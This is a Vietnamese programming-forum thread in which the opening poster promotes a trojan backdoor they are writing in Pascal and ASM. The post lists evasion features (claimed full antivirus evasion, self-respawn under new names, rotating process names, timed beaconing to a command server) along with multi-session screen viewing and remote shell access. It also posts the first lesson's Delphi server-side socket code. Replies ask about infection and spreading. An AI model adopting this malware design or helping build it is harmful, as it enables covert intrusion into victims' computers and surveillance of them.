Chào mừng đến với Diễn đàn lập trình - Cộng đồng lập trình.
Kết quả 1 đến 6 của 6
  1. #1
    Ngày tham gia
    Sep 2015
    Bài viết
    0

    Lập trình virus trojan backdoor nâng cao.

    Mạo muội lập topic này để anh em giao lưu chia sẻ kinh nghiệm về lập trình trojan [IMG]images/smilies/lick.gif[/IMG]

    Mình xin phép giới thiệu về tính năng của con trojan mình đang xây dựng [IMG]images/smilies/2.gif[/IMG]

    Ưu điểm:
    -> dễ dàng cập nhật version.
    -> chạy thông minh (khi nào cần sử dụng virus tự chạy ... không cần thì thôi không chạy ... khó tìm[IMG]images/smilies/wink.png[/IMG])
    -> nếu virus bị phát hiện ... victim sẽ tự nhiên mọc lại con mới ở ngay chỗ mới với 1 tên gọi mới [IMG]images/smilies/lick.gif[/IMG]
    -> anti virus 100% tất cả không phát hiện ra.
    -> không sử dụng lib hay dll gì riêng của win vì vốn tự có nên dung lượng hơi cao. (đã test chạy ok từ win xp đến 2012 r2).
    -> có thể chỉnh chế độ safe timer run , giả sử làm việc lúc 12h đêm đến 3h sáng thì trong khoảng thời gian đã định virus sẽ chạy và request về server , nếu ko đúng giờ thì nằm yên [IMG]images/smilies/biggrin.png[/IMG]
    -> Trong thời gian hoạt động, virus sẽ tự động tắt nghỉ 15 phút / lần để thay đổi process name liên tục để tránh bị truy quét. thường sẽ count process nào chạy *.exe nhiều nhất thì sẽ chạy theo tên đó, lập 1 danh sách cụ thể xếp theo thứ tự vào hoán đổi vị trí theo các chu kỳ. (rõ khổ cho các bác chạy anti vir = tay ^_^!)
    -> Tính năng ưa thích nhất: Virus chạy multi sessions. Giả sử không có user nào logon thì virus khi hoạt động sẽ chạy quyền cao nhất của windows, giả sử có 3 user admin, administrator, guest đang làm việc trên 1 máy, virus sẽ tự chạy cả 3 sessions thêm cái session thứ 4 cao nhất của windows -> tổng là 4. Vì vậy có thể nhìn màn hình trên mỗi user đang làm việc phân chia ra cụ thể.

    Khuyết điểm:
    -> size khá lớn thường là 3,5 mb.
    -> do code ẩu nên còn bug vài chỗ, khổ là phải đang ngồi fix và xem lại từng dòng [IMG]images/smilies/lick.gif[/IMG]
    -> tính năng chưa hoàn thiện mấy, nhưng về nhìn chung thì mình chỉ cần remote CMD thôi [IMG]images/smilies/17.gif[/IMG]

    Ngôn ngữ lập trình:
    -> Pascal
    -> ASM

    Vài hình ảnh interface cho các bạn tham khảo:











    <font color="Red">Bài 1: Kết nối:

    Server:
    Mã:
    procedure FormCreate(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure ServerSocket1ClientDisconnect(Sender: TObject;
          Socket: TCustomWinSocket);
    procedure ServerSocket1ClientError(Sender: TObject;
          Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
          var ErrorCode: Integer);
    procedure Starthostserver1Click(Sender: TObject);
    procedure Stophostserver1Click(Sender: TObject);
    procedure ServerSocket1ClientRead(Sender: TObject;
          Socket: TCustomWinSocket);
    
    procedure TForm1.FormCreate(Sender: TObject);
    var
      ResStream: TResourceStream;
    begin
      DeleteFile('DiaChi_IP.database');
      if not FileExists('DiaChi_IP.database') then begin
            ResStream := TResourceStream.Create(hInstance, 'DiaChi_IP', RT_RCDATA);
            try
              ResStream.Position := 0;
              ResStream.SaveToFile('DiaChi_IP.database');
            finally
              ResStream.Free;
            end;
      end;
    
      StatusBar1.Panels[0].Text := StatusBar1.Panels[0].Text + GetBuildInfoAsString;
      KetNoi_GS := 0;
      KetNoi_KT := 0;
      Spxp1.Click;
    end;
    
    procedure TForm1.FormShow(Sender: TObject);
    var
      i : Integer;
    begin
      for i := 0 to ParamCount do begin
        if ParamStr(i) = '/@/Khoi_dong_tat_ca/@/' then begin
          Starthostserver1.Click;
          Khingmychktni1.Click;
        end;
      end;
    end;
    
    
    procedure TForm1.ServerSocket1ClientConnect(Sender: TObject;
      Socket: TCustomWinSocket);
    begin
      KetNoi_GS := KetNoi_GS + 1;
      ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS));
    end;
    </font>

  2. #2
    Bác cho em hỏi 1 chút là pascal thì giao tiếp với api window kiểu gì vậy, hồi lớp 10 học mỗi turbo pascal, toàn dos.
    Thank bác

  3. #3
    Thế còn lây nhiễm và phát tán thì sao ạ? [IMG]images/smilies/clap_grin.gif[/IMG]

  4. #4
    Ngày tham gia
    Sep 2015
    Bài viết
    0
    Rãnh giả mang luôn, sao mình thấy đối tượng theo giỏi toàn window server không vậy ? Íts khi nao thay user sài windows server lắm ... chắc cái naa`y server của bạn phải kô ?

  5. #5
    Ngày tham gia
    Sep 2015
    Bài viết
    0
    con này gờ còn xài được không anh?

  6. #6
    Ngày tham gia
    Sep 2015
    Bài viết
    0
    Pascal

    Mã:
    procedure TForm1.ServerSocket1ClientConnect(Sender: TObject;  Socket: TCustomWinSocket);begin  KetNoi_GS := KetNoi_GS + 1;  ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS));end;
    Delphi 10(2006) trở lên mới dùng được tiếng Việt trực tiếp trong code - Các phiên bản trước phải dùng thư viện Tnt

 

 

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •